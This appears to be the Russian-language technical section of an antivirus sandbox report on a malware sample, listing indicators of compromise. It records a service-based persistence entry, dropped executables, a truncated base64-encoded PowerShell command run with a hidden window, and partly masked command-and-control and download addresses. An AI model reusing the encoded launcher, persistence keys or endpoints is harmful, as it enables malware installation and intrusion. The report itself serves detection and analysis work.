Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dnscacheugc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dnscacheugc] 'ImagePath' = '"%WINDIR%\SysWOW64\mfcm100\dnscacheugc.exe"'
- 'dnscacheugc' "%WINDIR%\SysWOW64\mfcm100\dnscacheugc.exe"
- 'dnscacheugc' %WINDIR%\SysWOW64\mfcm100\dnscacheugc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAegBfADgAMAB1AD0AKAAnAE0ANAB0AHIAJwArACcAbABsAGoAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAFYAOgBUAEUATQBQAFwATwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\ebx_b2iy.exe
- %WINDIR%\syswow64\mfcm100\dnscacheugc.exe
- %TEMP%\office2019\ebx_b2iy.exe в %WINDIR%\syswow64\mfcm100\dnscacheugc.exe
- '18#.#0.61.163':443
- http://ta#o.cl/resumen-uso-inodos/2/
- http://18#.##.61.163:443/TG1lWRmlNpUwl6ahcO/aDCRx1Xwsg63t9k/tWhvFfUNCFg3x0TU4aC/ via 18#.#0.61.163
- DNS ASK ta#o.cl
- '%TEMP%\office2019\ebx_b2iy.exe'
- '%WINDIR%\syswow64\mfcm100\dnscacheugc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAegBfADgAMAB1AD0AKAAnAE0ANAB0AHIAJwArACcAbABsAGoAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAFYAOgBUAEUATQBQAFwATwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)